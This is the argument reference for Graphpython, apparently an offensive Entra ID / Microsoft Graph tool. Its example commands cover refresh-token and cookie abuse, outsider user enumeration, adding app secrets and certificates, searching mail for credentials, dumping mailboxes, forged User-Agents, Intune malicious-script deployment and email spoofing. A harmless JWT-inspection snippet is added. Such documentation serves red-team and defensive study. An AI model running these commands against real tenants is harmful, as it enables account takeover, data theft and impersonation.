mc edited this page Jul 24, 2024 · 22 revisions

This page documents the available arguments and switches for Graphpython.

usage: Graphpython [-h] [--command COMMAND] [--list-commands] [--token TOKEN] [--estsauthcookie ESTSAUTHCOOKIE] [--use-cae] [--cert CERT]
                   [--domain DOMAIN] [--tenant TENANT] [--username USERNAME] [--secret SECRET] [--id ID] [--select SELECT] [--query QUERY]
                   [--search SEARCH] [--entity {driveItem,message,chatMessage,site,event}] [--device {Mac,Windows,AndroidMobile,iPhone}]
                   [--browser {Android,IE,Chrome,Firefox,Edge,Safari}] [--only-return-cookies]
                   [--mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}] [--top TOP]
                   [--script SCRIPT] [--email EMAIL]


-h, --help

Show the help message and exit

Graphpython -h

--command COMMAND

Specify the command to execute

Graphpython --command get-currentuser --token <token>


--list-commands

List all available commands

Graphpython --list-commands


--token TOKEN

Provide a Microsoft Graph access token, or a refresh token for FOCI abuse. The token can be supplied either raw on the command line or as the path to a file containing it

Graphpython --command get-user --token eyJ0...
Graphpython --command find-privilegedapplications --token token.txt 
Graphpython --command invoke-refreshtoazuremanagementtoken --token <refreshtoken> --tenant <tenantid>

--estsauthcookie ESTSAUTHCOOKIE

Supply 'ESTSAuth' or 'ESTSAuthPersistent' cookie for Invoke-ESTSCookieToAccessToken

Graphpython --command invoke-estscookietoaccesstoken --estsauthcookie ESTSAUTHPERSISTENT=... --tenant <tenantid> --use-cae
Graphpython --command invoke-estscookietoaccesstoken --estsauthcookie ESTSAUTH=... --tenant <tenantid> --use-cae


--use-cae

Flag to enable Continuous Access Evaluation (CAE), which adds 'cp1' as a client claim to obtain an access token valid for 24 hours. Can be used with the following authentication commands:

  • Invoke-RefreshToMSGraphToken
  • Invoke-RefreshToAzureManagementToken
  • Invoke-RefreshToMSTeamsToken
  • Invoke-RefreshToOfficeAppsToken
  • Invoke-RefreshToOfficeManagementToken
  • Invoke-RefreshToOutlookToken
  • Invoke-RefreshToSubstrateToken
  • Invoke-RefreshToYammerToken
  • Invoke-RefreshToOneDriveToken
  • Invoke-RefreshToSharePointToken
  • Invoke-ESTSCookieToAccessToken

Graphpython --command <above> --token <refresh> --tenant <tenantid> --use-cae
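
For defenders triaging a token found in logs or on a host, the effect of --use-cae can be read from the token itself: Entra ID reflects the 'cp1' client capability in the access token's `xms_cc` claim. The following is an added example, not part of Graphpython; it decodes the payload without verifying the signature, and the sample tokens and the all-zero app ID are constructed.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_access_token(jwt: str) -> dict:
    """Decode the payload only. No signature check: this is triage, not validation."""
    parts = jwt.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    claims = json.loads(b64url_decode(parts[1]))
    caps = claims.get("xms_cc", [])
    if isinstance(caps, str):          # tolerate a single string value
        caps = [caps]
    iat, exp = claims.get("iat"), claims.get("exp")
    lifetime = round((exp - iat) / 3600, 2) if iat and exp else None
    return {
        "app_id": claims.get("appid") or claims.get("azp"),  # v1 / v2 token formats
        "audience": claims.get("aud"),
        "cae_capable": "cp1" in caps,  # client declared the CAE capability
        "lifetime_hours": lifetime,
    }


def make_sample(extra: dict) -> str:
    # Constructed, unsigned sample token so the example runs offline.
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    claims = {"aud": "https://graph.microsoft.com",
              "appid": "00000000-0000-0000-0000-000000000000",
              "iat": 1721800000}
    claims.update(extra)
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}.sig"


# A 24-hour token carrying cp1, and an ordinary 75-minute token without it.
SAMPLE_CAE = make_sample({"exp": 1721800000 + 24 * 3600, "xms_cc": ["cp1"]})
SAMPLE_DEFAULT = make_sample({"exp": 1721800000 + 75 * 60})

if __name__ == "__main__":
    for name, tok in (("cae", SAMPLE_CAE), ("default", SAMPLE_DEFAULT)):
        print(name, inspect_access_token(tok))
```
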

--username USERNAME

Provide an email address, or a file containing user email addresses, for user enumeration as an outsider

Graphpython --command invoke-userenumerationasoutsider --username <email>/users.txt

--cert CERT

Path to an X509Certificate

  • .pfx for Invoke-CertToAccessToken
  • .crt, .cer, or .pem for Add-ApplicationCertificate

Graphpython --command invoke-certtoaccesstoken --cert certificate.pfx --id <appid> --tenant <tenantid>
Graphpython --command add-applicationcertificate --cert certificate.crt --id <appobjectid> --token <token>

--domain DOMAIN

Specify the target domain

Graphpython --command get-tenantid --domain <domain>
Graphpython --command invoke-reconasoutsider --domain <domain>

--tenant TENANT

Specify the target tenant ID. Used with authentication/refresh commands

Graphpython --command invoke-refreshtomsgraphtoken --tenant <tenantid> --token <refresh> --use-cae

--secret SECRET

Enterprise application secretText value used to generate an access token with Invoke-AppSecretToAccessToken. You can also add an application secret with Add-ApplicationSecret and then use the secret it returns

Graphpython --command invoke-appsecrettoaccesstoken --secret <secretText> --id <appid> --token <token>


--id ID

ID of the target object. The meaning depends on the command: it can be an object, app, user, group, ... ID. A User Principal Name is also supported for user-based commands

Graphpython --command get-application --id <appid> --token <token>
Graphpython --command get-user --id <upn> --token <token>

--select SELECT

Fields to select and filter from the response for refining heavy output

Graphpython --command get-user --select id,displayName,userPrincipalName --token <token>
Graphpython --command list-recentonedrivefiles --select name,webUrl --token <token>

--query QUERY

Raw API query URL (GET only) for use with Invoke-CustomQuery

Graphpython --command invoke-customquery --query <url> --token <token>


Only used with Invoke-Search

--search SEARCH

Search string for querying

Graphpython --command invoke-search --search "password" --entity driveItem --token <token>

--entity ENTITY

Specify the type of entity to search for:

  • driveItem - OneDrive items
  • message - Mail messages
  • chatMessage - Teams chat messages
  • site - SharePoint sites
  • event - Calendar events

Graphpython --command invoke-search --search "credentials" --entity message --token <token>


Can be used for all commands

--device DEVICE

Specify the device type for User-Agent forging

  • Mac
  • Windows
  • AndroidMobile
  • iPhone

Graphpython --command get-userproperties --device Mac --browser Safari --token <token>

--browser BROWSER

Specify the browser type for User-Agent forging

  • Android
  • IE
  • Chrome
  • Firefox
  • Edge
  • Safari

Graphpython --command get-group --browser Edge --device Windows --token <token>


Only used with Dump-OWAMailbox

--mail-folder FOLDER

Specify the mail folder to dump

  • Allitems
  • inbox
  • archive
  • drafts
  • sentitems
  • deleteditems
  • recoverableitemsdeletions

Graphpython --command dump-owamailbox --mail-folder inbox --token <token>
Graphpython --command dump-owamailbox --mail-folder drafts --id <userid/upn> --token <token>

--top TOP

Number of messages to retrieve (integer) from the mail folder

Graphpython --command dump-owamailbox --mail-folder inbox --top 10 --token <token>
Graphpython --command dump-owamailbox --mail-folder drafts --id <userid/upn> --top 20 --token <token>


--script SCRIPT

File containing the script content for Deploy-MaliciousScript or Backdoor-Script

Graphpython --command deploy-maliciousscript --script malicious.ps1 --token <intunetoken>

--email EMAIL

File containing OWA email message body content for Spoof-OWAEmailMessage

Graphpython --command spoof-owaemailmessage --id <userid to spoof> --email email-body.txt --token <token>